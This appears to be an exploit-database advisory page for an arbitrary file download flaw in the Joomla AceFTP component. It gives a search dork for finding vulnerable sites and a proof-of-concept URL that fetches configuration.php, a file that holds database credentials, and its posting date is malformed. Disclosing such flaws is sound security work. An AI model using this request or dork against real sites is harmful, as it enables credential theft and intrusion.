Joomla com aceftp Arbitrary File Download Vulnerability

Posted on 30 November -0001

<HTML><HEAD><TITLE>Joomla com aceftp Arbitrary File Download Vulnerability</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>##############################################################
# Exploit Title: Joomla com aceftp Arbitrary File Download Vulnerability
# Exploit Author: howucan
# Dork : inurl:/administrator/components/com_aceftp/
# Software Website : http://www.joomace.net/downloads/aceftp
# Version : ALL
# Date : 2016/08/15
# Tested on : Parrot Os 3.1
# Category: webapps
# 
########################
# Description :
#
# AceFTP is a smart, fast and lightweight file manager component. It
# operates from Joomla back-end so you don't have to use any FTP program
anymore.
########################
# POC :
#
#
http://localhost/path//administrator/components/com_aceftp/quixplorer/index.php?action=download&dir=&item=configuration.php&order=name&srt=yes
##############</BODY></HTML>

TOP

Malware :

None in database

Last 20

Exploits :

Last 20